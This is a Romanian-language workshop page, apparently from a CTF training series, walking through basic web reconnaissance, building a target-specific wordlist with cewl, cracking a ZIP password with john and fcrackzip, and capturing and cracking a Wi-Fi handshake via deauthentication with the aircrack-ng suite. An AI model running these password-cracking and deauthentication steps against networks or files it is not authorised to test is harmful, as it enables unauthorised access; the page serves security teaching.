---
title: Ixodron 2024 - Demo 2
date: 2024-09-03 10:00:00
categories:
  - CTFs
  - Ixodron 2024
  - Demo
tags:
  - CTFs
  - Ixodron 2024
  - Demo
toc: true
---

---
> Al doilea set de exerciții din seria de `Demo`-uri

---
<!-- more -->

<br>

## 1. Server web
> Executarea unor teste de securitate de bază pe un server web pentru a-i înțelege caracteristicile

**1.1. Codul sursă**
Deschide pagina în browser: `https://ixodron.ro`
Vezi codul sursă: `click-dreapta`, `View page source`

> **TASK**: Ce generator de site folosesc? Ce versiune este? (cuvinte cheie: `generator`, `version`)

<br>

**1.2. Developer tools - network tab**

Deschide Developer Tools: `Fn + F12` sau `CTRL+SHIFT+I`
Selectează `Network Tab`
Reîncarcă pagina pentru a vedea traficul de date: `CTRL+R`

> **TASK**: Selectează doar imagini și salvează logo-ul paginii.

<br>

**1.3. Developer tools - storage tab**

Deschide Developer Tools: `Fn + F12` sau `CTRL+SHIFT+I`
Selectează `Storage`
Vezi secțiunea de `Cookies`

> **TASK**: Șterge cookie-urile din browser.

<br>

**1.4. Certificat SSL**

Iconița cu lacăt 🔒
`Connection secure`
`More information`
`View certificate`

> **TASK**: Care este utilizarea cheii? (`Key usage`)


<br>
<br>


## 2. Parole personalizate
> Crearea unor liste de parole personalizate pentru ținta atacului

```bash
mkdir -p /home/kali/demo-1/wordlist/
cd /home/kali/demo-1/wordlist/
```

**Instalează aplicația `cewl`**
```bash
sudo apt install cewl -y
cewl --help
```

**Generarea unei liste de parole personalizate pentru site-ul web ales**
```bash
cewl https://chronossec.site -w wordlist.txt -m 5 -d 1 -v
```
| Argument  | Descriere |
| -- | -- |
| `-w wordlist.txt` | numele fisierului ce va fi generat |
| `-m 5` | numarul minim de caractere al cuvintelor selectate |
| `-d 1` | depth - adancimea linkurilor verificate |
| `-v` | verbose - detalii despre process |

**Verificarea listei de parole generate**
```bash
cat wordlist.txt
wc -l wordlist.txt
```


<br>
<br>


## 3. Arhiva ZIP
```bash
mkdir -p /home/kali/demo-1/archive
cd /home/kali/demo-1/archive
```
> Spargerea unor arhive protejate de parole
**Descarcă fișierul: <a href="https://chronossec.site/uploads/ixodron-ctf/demo-1/archive.zip" target="_blank">link</a>.**
```bash
wget https://chronossec.site/uploads/ixodron-ctf/demo-1/archive.zip /home/kali/demo-1/archive/archive.zip
```

**Extrage lista extensivă de parole, `rockyou.txt`**
```bash
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
```

**Sparge parola**

- `Metoda 1`
> Folosim `zip2john` pentru a converti parola arhivei într-un format compatibil cu `john`.
```bash
zip2john archive.zip > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

- `Metoda 2`
> Utilizăm `fcrackzip` pentru atac de dicționar direct asupra arhivei.
```bash
sudo apt install -y fcrackzip
```
```bash
fcrackzip -D -v -u -p /usr/share/wordlists/rockyou.txt archive.zip
```
| Argument | Descriere|
| -- | -- |
| `-D` | atac tip Dicționar |
| `-v` | mai multe informații (verbos) |
| `-u` | încearcă să dezarhiveze cu fiecare parolă generată |
| `-p` | fișierul cu lista de parole |

**Extrage fișerul** (înlocuiește parola găsită)
```bash
unzip -P password archive.zip
```


<br>
<br>


## 4. Wi-Fi
> Spargerea parolei unei rețele Wi-Fi 

**4.1. Inserarea adaptorului de rețea (antena)**
<br>

**4.2. Configurarea interfeței de rețea**
```bash
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 down
iwconfig
```
```bash
sudo airmon-ng start wlan0
airmon-ng check kill
```

**4.3.Alegerea rețelei și clientului țintă**
```bash
sudo airodump-ng wlan0
```
```
sudo airodump-ng --bssid <INPUT> --channel <INPUT> --write capturefile wlan0
```

**4.4. Deuthentificarea clientului de la rețea**
> Dacă trimitem un număr mic de pachete de deautentificare, clientul nu-și va da seama că a fost deconectat, 
    iar noi vom putea intercepta direct parola criptată trimisă de acesta către router (access point)
```bash
sudo aireplay-ng --deauth 4 -a <target_MAC> -c <client_MAC> wlan0
```

**4.5. Spargerea parolei criptate**
```bash
sudo aircrack-ng capturefile.cap -w /usr/share/wordlist/rockyou.txt
```

<br>
<br>

<p style="text-align:center">
  <b>NEXT</b>: <a href="/CTFs/Ixodron/ctf/" target="_blank">CTF</a>
</p>

---
---